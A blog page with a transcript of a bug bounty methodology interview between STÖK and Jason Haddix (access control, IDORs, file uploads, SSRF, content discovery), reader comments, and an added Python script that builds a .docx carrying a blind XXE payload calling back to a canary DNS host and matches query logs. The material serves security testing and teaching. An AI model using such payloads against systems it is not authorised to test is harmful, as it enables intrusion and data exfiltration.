BUG BOUNTY METHODOLOGY TIPS TO ALWAYS TEST FOR! with Jason Haddix

…Wow, here we go..

STÖK: Alright so, people have been asking me a lot: "STÖK, how do you do your recon?" And the thing is that I don't really do any recon. But when it comes down to discussing what you do when you first approach a new target, there are different kinds of ideas of what you should do, so I just decided to ask Jason Haddix about it. So Jason, when you approach a new target, what are the things that are crucial, that a new bounty hunter shouldn't miss?

Jason: Yeah, I think a lot of the new bounty hunters will look at a target, like something you have to log in to, and they'll just start poking around at the external stuff, like external search forms and parameters on the outside, and not really dive into learning the application, like actually using it like a user would. If you think of it like an iceberg, all you're seeing is the tip when you start, but you need to get way down to the bottom of that iceberg, where all the sensitive functionality probably is.

STÖK: Oh yeah, absolutely, I get it. So instead of just poking around on the outside, access privileges come into play. Me personally, what I do is I spin up Burp and then I spend an hour or two just walking through the website and trying different kinds of things: logging out, logging in as another user, doing it again, and then eventually I'm replaying these sessions to see if I'm able to do something as an unprivileged user and then eventually as an admin.

Jason: That's exactly what I do. In fact there are some Burp plugins for that kind of stuff, but I just keep everything marked by hand, honestly, sort of like a spreadsheet or something, and I say "X user can do x and Y user can do y", and let's see if they can do stuff to each other. And that's the beginning of my access control testing part, which is the second tip I usually give people: access control bugs and IDORs are really important to look for in bounty programs, because there's no library that fixes those types of bugs. If you think of injection bugs, a patch could fix an injection bug; you know, applying a third-party library can fix cross-site scripting bugs, but it's really hard to fix access control bugs.

STÖK: And they are all logical, right?

Jason: Yeah, all logical.

STÖK: Cool. Alright, so next one.
Jason: Yeah, so when you're on the site, you're going to want to see how the site references you as a user, right? It's not always the cookies that register what you're doing or what you're allowed to do on the site; sometimes, you know, there's a unique identifier passed either in the URL or in some parameter that identifies you, and that's the first place I look for IDORs and stuff like that. But shortly after that it's file uploads. I have found a majority of bugs this year on file upload functionality. So when you log into the application there's always, like, a profile page on enterprise application stuff, or your image. When I'm looking at a site I want to find all the file uploads and identify them, right? There are our RCEs, where you piggyback command injection like ImageTragick, and embedding JavaScript inside of files; you know, there's XML entity injection if the file format is based on XML, like Word docs and stuff like that. So file uploads have just, like, a crazy amount of attack surface based on them, and so I look at them.

STÖK: And it's so challenging for people just to make sure that they sanitize it all right, and this is also where some of the really golden goose bugs appear. It's a great area to put a lot of research in. I spend shitloads of time designing PDFs with payloads inside them manually, and I learned how to write PDFs by hand now. It's a lot of waste of time, but then again my payloads are... mmm, they are mint.

Jason: Yeah, and then you have it next time, right? Like once you put the investment in to make the template for one of those uploads, you have it for next time. In fact, Mario from Cure53, they have a repository that you can start with: on Cure53's GitHub there's a project where they have a whole bunch of file formats that have XSS attacks in them, and you can move off of there and start modifying, creating your own directory of file formats and the bugs associated with them.
STÖK: XXEzzzz..

Jason: Yeah, and the other tip there is, a lot of days you're not going to get the direct feedback from those types of bugs, where the application view actually shows you that you have a bug; a lot of them are blind nowadays, right? And what I do is I name them in certain ways and use unique DNS lookups for them, and have this Excel sheet where, over time, I just log traffic to my DNS server. So I receive something, it hits, and I know, I remember that one, that's like a month ago since I put that one in, and then they spun it up again and this shit fucking happens.

STÖK: Awesome. Alright, so third place, where to look now?

Jason: What I'm doing is I'm looking at all the parameters and all of the endpoints that took data, so those are called dynamic parameters, right, and I'm looking at what kind of data they took: was it a string, was it, you know, alphanumeric, was it just numerals. And then eventually the places that actually take paths and URLs and parse them, those parameters I'm going to look at very, very strictly for bugs like SSRF, local file includes, path traversal, remote file includes. Any place that parses a path or a page or references another place, I'm going to pay special attention to.
STÖK: If you are totally new at this, where would you recommend people start?

Jason: Um, so a lot of times when you get into an application, you know, there's an integration section, if it's an enterprise application; they're trying to hook up other services to their own site. Like, a lot of Fortune 100 companies use APIs to pull in all kinds of stuff.

STÖK: Aah, so it's cross-platform.

Jason: Right. So in that section of the app, first see if there are any integrations that they want to hook up via, either, webhooks. Those are likely vulnerable; those integration places are likely vulnerable to SSRFs. I see them a lot of times.

STÖK: And those are primarily not always automatable, right? So it takes you a little bit of tweaking?

Jason: It takes me a lot of tweaking to find them. And if anyone tells you SSRFs are easy, they are lying, right? Unless your generic SSRF payload really works out of the box, right, it's either the padding has to be changed, like you've got to do double or triple, you know, forward or back slashes, you've got to reference your domain like an octal; it's like all this crazy stuff, right? So I have to play around with them a lot. Very rewarding, but when they pop it's like... I get goosebumps just thinking about it. They are so amazing, the feeling you have where you can see that it hits your Collaborator or hits your DNS server, you know, like "oh yeah, yeah, yeah, I've got something."

FOUR: A lot of people focus on RCE and bugs, and I actually think that leaking private data can be just as damaging. In fact, most of my authentication bypass type bugs, or logic type bugs, or whatever you want to call them... so content discovery is king in this world, right? Basically looking for hidden paths that are not linked anywhere on the website: administration panels, you know, log pages.

STÖK: Are we talking brute forcing here?

Jason: Yeah, we're talking about brute forcing here. Yeah, so I mean I use a list that I've published pretty exclusively to do my brute forcing and my content discovery.

STÖK: The Jason Haddix all.txt?

Jason: I wonder if it's that one? ;))) I use that in my content discovery; it's a huge list. I find stuff off that list. So directory brute forcing is something you want to do.

STÖK: And also, if you're new, try to save all the endpoints that you stumble upon to your list. Curating your word list is key. Jason has created one of the best lists out there, but you have to redefine it, because that way you will bring a unique perspective to each and every engagement you enter.

Jason: Yeah, and there are some people out there doing cool research, right, like the Assetnote guys, Naffy and Shubs and Michael over there. They released the Commonspeak dictionary, which is pretty cool. But as you go, you know, add your own stuff there: add your own paths and links; when a new open-source project comes out, parse all the paths and add them to your content discovery, right? Eventually someone's going to make a mistake with access control.
STÖK: Final and last tip. (FIVE)

Jason: If you're on an app that is a messaging platform, right, the security of the messages themselves, the text of the message, is just as important to them as leaking, you know, a piece of credit card information or getting an RCE, right? So, like, what other than technical vulnerabilities do they care about? And that gives me more, like, space to work in the application if I'm not just looking for tech bugs.

STÖK: Absolutely, and I totally agree. I've found some really, really, really nice high-paying bugs, non-technical stuff that was just "lying" around there, but it didn't execute until you did a certain kind of step. Fun times. Okay, so thank you very much, Jason. Hopefully this will be a couple of tips for anyone that's hungry to get started and starting to look for ways of testing and bug bounties. Have a good one and I'll see you around, buddy.
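The file-upload tip and the blind-callback tip above fit together in one small workflow: plant a uniquely named DNS canary inside an XML-based upload (here a .docx), keep a ledger of what was planted where, and later map DNS query-log lines back to that ledger. The script below is an added example written for this page; it is not code from the video, from Jason or from STÖK, and it assumes things the interview never states: that you control the zone canary.example and log every query for it, that the log is in a BIND 9 style "client ip#port: query: name IN type" format, and that the target name "acme-portal" and the sample log lines are made up.

```python
"""Blind XXE canary workflow for file-upload testing (added example).

Plant a unique DNS name in an XML-based upload, keep a ledger of what you
planted where, and later map DNS query-log lines back to the ledger.
"""
import io
import re
import zipfile

# Assumption: you control the zone canary.example and log every query the
# authoritative server answers for it. Neither the zone nor the target
# names below come from the video; they are made up for this example.
CANARY_ZONE = "canary.example"


def canary_host(target: str, feature: str, planted_on: str) -> str:
    """Unique hostname that encodes when, where and in which feature the
    payload was planted, so a lookup that shows up a month later can still
    be traced to one specific upload. planted_on is an ISO date string."""
    label = f"{planted_on}-{target}-{feature}".lower()
    label = re.sub(r"[^a-z0-9]+", "-", label).strip("-")  # keep it a valid DNS label
    return f"{label}.{CANARY_ZONE}"


def build_xxe_docx(host: str) -> bytes:
    """Smallest .docx-shaped zip that still carries an XXE payload. A parser
    that resolves external entities while reading word/document.xml will
    resolve `host` in DNS even when nothing is reflected to the uploader.
    Parts are stored uncompressed so the payload is greppable on disk."""
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>'
        '<Default Extension="xml" ContentType="application/xml"/>'
        '<Override PartName="/word/document.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"/>'
        "</Types>"
    )
    rels = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="word/document.xml"/>'
        "</Relationships>"
    )
    document = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        # The external entity is the payload: resolving it forces a DNS lookup
        # of the canary host before any HTTP request is even attempted.
        f'<!DOCTYPE w:document [<!ENTITY xxe SYSTEM "http://{host}/x">]>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p><w:r><w:t>&xxe;</w:t></w:r></w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("_rels/.rels", rels)
        z.writestr("word/document.xml", document)
    return buf.getvalue()


# Constructed BIND 9 style query-log lines for this example (not real
# traffic). Format assumption: "<date> <time> client <ip>#<port>: query: <name> IN <type> ...".
SAMPLE_QUERY_LOG = """\
12-Jun-2019 09:14:02.113 client 203.0.113.7#41234: query: 2019-05-12-acme-portal-avatar-upload.canary.example IN A + (198.51.100.1)
12-Jun-2019 09:14:02.120 client 203.0.113.7#41234: query: 2019-05-12-acme-portal-avatar-upload.canary.example IN AAAA + (198.51.100.1)
12-Jun-2019 11:02:55.001 client 198.51.100.23#5353: query: www.example.org IN A + (198.51.100.1)
"""

QUERY_LOG_RE = re.compile(
    r"^(?P<ts>\S+ \S+) client (?P<client>[0-9a-f.:]+)#\d+[^:]*: query: "
    r"(?P<name>\S+) IN (?P<qtype>\S+)"
)


def match_canary_hits(log_text: str, ledger: dict) -> list:
    """Map query-log lines back to the ledger (canary hostname -> note about
    where it was uploaded). A and AAAA lookups from the same resolver for the
    same name are reported once. Returns (timestamp, resolver_ip, note)."""
    seen, hits = set(), []
    for line in log_text.splitlines():
        m = QUERY_LOG_RE.match(line)
        if not m:
            continue
        name = m["name"].rstrip(".").lower()
        if name not in ledger or (m["client"], name) in seen:
            continue
        seen.add((m["client"], name))
        hits.append((m["ts"], m["client"], ledger[name]))
    return hits


if __name__ == "__main__":
    host = canary_host("acme-portal", "avatar-upload", "2019-05-12")
    with open("avatar.docx", "wb") as f:
        f.write(build_xxe_docx(host))
    ledger = {host: "acme-portal: profile avatar upload, planted 2019-05-12"}
    for ts, resolver, note in match_canary_hits(SAMPLE_QUERY_LOG, ledger):
        print(f"{ts} lookup from {resolver} -> {note}")
```

Note that the resolver IP in the log is usually the target's DNS resolver, not the parsing host, and that a DNS hit alone only proves an entity was resolved; whether the parser also follows the HTTP URL, or whether a parameter-entity variant is needed to exfiltrate anything, is a separate test.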

78 thoughts on “BUG BOUNTY METHODOLOGY TIPS TO ALWAYS TEST FOR! with Jason Haddix”

  1. Why does content discovery never work for me?
    I usually launch content discovery on the main domain!
    Do I have to launch it on a particular endpoint, or will Burp eventually include that one on its own?

  2. Getting started on my first private bounty, and following your videos has helped me a lot. Thank you for all you do!

  3. Can you do a vid discussing your HW? Looking to buy a laptop to run Kali Linux and still can't decide; would be interested to know how you decide on yours (especially when you travel), and if it is a factor for you at all or you just use whatever. Keep up the good vids man, good job!

  4. Wow !!! That is the best education content about hacking that I have ever seen !!!

    STÖK
    is a King !

  5. … hella bug bounty P3, burp went off found you, xss fuckin call in, xss fuckin call in… – ytcracker / touchscreen maison

    Appreciate the content. More bounty hunters the better, there are so many vulns to be fixed all over, saving one user/company at a time.

  6. Awesome, Stök and Jason Haddix, very informative. Looking for NahamSec's and some other cool researchers' recon steps sharing, and also waiting for #AskStok 😀

  7. Great content, stay motivated and keep swinging for the fences. You'll eventually hit it.

  8. This video is insane!! I'd love to have more perspectives from other hunters on what they focus on.

  9. I wanna ask u something: if we wanna hack a computer, then how could we find the target IP address? I am confused on it.

  10. You are great bro. I am a noob learning from books, searching PoCs and seeing what they are doing, but I am still confused, don't know how to start. Confusion sucks.

  11. Nice ideas in this talk. It would help if you could add links to the helping sources/projects to the description of the video for reference.

  12. This video is really useful. I'm a bit confused tho: in Haddix's videos (Hunter Methodology 1, 2, 3) he heavily focuses on recon, but for a beginner like me doing recon has been pretty useless and a waste of time lol

  13. Hey Stok, what's up. My tool is half built for embedding XXE payloads in document files; your 7.5k bug gave me an idea. I've not been rewarded much for XXEs as many were out of scope, but nonetheless you are a pro and I admire you!
    Hack like a pro! 😎

  14. Hey Stok, thank you for the videos, as always very informative. Can you point me in the right direction of where to learn how to write my own PDF payloads? I've used tools, but they don't always work, and I feel like if I learned it myself it would be a lot better.

  15. Hey! Just wanted to say your videos are great man. Found my first bug yesterday; unfortunately it was a dupe, but this video alone has given me a lot of ideas and stuff to research! Keep it up, I look forward to the next video!

  16. I'm a total newbie here, and you are my hero. Subscribed to you everywhere :D Can't find jhaddix all.txt SecList btw

  17. Hi, I need help. What if we find gulp.js files on a website? How can I use it, or is it of any use?

  18. This format with tips and screenshots is so useful, please keep it up!! I've learned a lot from this video. Thank you so much!! You guys are awesome.

  19. Hi Stok

    When doing bug bounty hunting, do you use a VM, a persistent USB, or do you have a laptop set aside for that?

    Please let me know the advantages and disadvantages of each.

    Thank you

  20. Gonna start bug bounty hunting in a couple of weeks, spending the 5 months of summer holidays I have to find a bug and grind. Your vids help a lot; would love some more beginner advice tutorials 😃

  21. I love this! I have recently started bug bounty, which took a long time to prep for (as a high school student), and I've recently made my first bounty for an XSS! It took me forever to find it, and I launched many Burp Intruder attacks and other random stuff like inspecting the code! Anyways, thanks so much for these videos, they really help!

  22. Personally I don't get too much new information from the videos, as I have some experience in the topic, but it is a great pleasure to watch the way you talk and the way you make videos! Keep up the great work you do!

  23. I would also say that programming or development courses do help a lot, as you get a better understanding of how exactly modern technologies are used. If you always get stuck at exploiting AWS, go get a development course on that!

  24. What programming language should I learn if I want to get into web application hacking/penetration testing?

  25. Kudos for learning to write PDFs by hand. I spent ~4 years on PDF and its specification and it pays off – but it is a pain especially at the beginning

  26. You're awesome! I'm learning a cyber security course in school, and you make me want it more; I'm learning so much. I was upset that I suck at coding in Python, and most of my class knows Python, and I said to myself maybe it's not for me, but after seeing your video I see that I can be a good hacker and bug bounty hunter without code.

  27. @STÖK would you one day discuss some tips and tricks for monitoring a program?
    I have been hearing a lot about how people like you and Jason H monitor programs for new stuff, and I was wondering how this can be achieved.

  28. You mentioned you have a DNS server which logs traffic. Is this for when you're attempting code execution? If so, would that mean you have personal payloads that query your DNS server? Could you do a video on how one might set that up, or even just link me to some helpful articles on doing so?

    I've been thinking about it a lot, because you might start testing for a bug, find one, but when testing you can't execute "malicious" code. So a DNS payload sounds smart. I also know you can smuggle information out of a secure server via DNS too, so that is a double.

  29. Thanks for the great content!!

    Do you always work on apps which offer a bounty program, or do you just choose one app which you are in favor of? I'm scared that if I found a bug in an app and sent them my report, they would call the lawyers. Could that be a thing?

  30. Hey
    Thank you for your video mate, you are really doing a great job.
    I have two requests for this video.
    First one: we would like to have some sort of references based on what Jason said. You know the net is deep, and it is so hard to find where to practice these attacks; it would be awesome if you could add to the videos the sites or blogs where we can see details explained about each of the mechanics you and he use, or experts do.
    Second one: Jason said that directory brute-forcing is a necessity to find hidden directories… but more than 90% of websites run Cloudflare, and they block your attempts…
    Do you recommend using proxies to do so, or how do you guys do it?
    Anyways the video was great, keep it up <3

  31. First, thx bro for sharing this awesome info 🙂
    Second, noob question 🙂 But how can I use that all.txt? Is it through Content Discovery and then the config tab, using it in the custom file list, or through Intruder?

  32. I just want to ask you one thing:
    I am really interested in bug bounty, but I do not have much knowledge of programming languages, though I know a little bit of C. What suggestions would you like to give me to get started??
    Your reply would be appreciated!
